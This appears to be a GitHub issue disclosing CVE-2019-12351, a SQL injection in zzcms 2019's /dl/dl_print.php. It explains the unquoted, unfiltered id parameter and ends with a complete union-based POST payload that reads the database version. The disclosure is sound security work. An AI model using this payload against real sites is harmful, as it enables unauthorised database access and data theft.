CVE-2019-12351: zzcms 2019 dl/dl_print.php SQL injection · Issue #3 · cby234/zzcms

Link Url : http://www.zzcms.net/about/6.htm
Edition : ZZCMS2018升2019 (2019-01-11)

0x01 Vulnerability (/dl/dl_print.php line 76 ~ 80)

If index of ‘,’ value in id parameter is bigger than 0 sql will be

When we check the query there is no single quote to id parameter. So We can inject

any query with id parameter

We can find there is no security filter for id parameter and we can inject Sql query via id parameter

if we concat ‘,’ value at the end of id parameter

0x02 payload

give below “POC” value for post data in “/dl/dl_print.php”

POC : union SQL injection menu1=%3Fb%3D123%26province%3D%26city%3D%26keyword%3D%26page_size%3D2&FileExt=xls&sql=select+count%28*%29+as+total+from+zzcms_dl+where+classid%3D1+&chkAll=checkbox&id%5B%5D=1) union select 1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,version(),0,1,2,3-- a,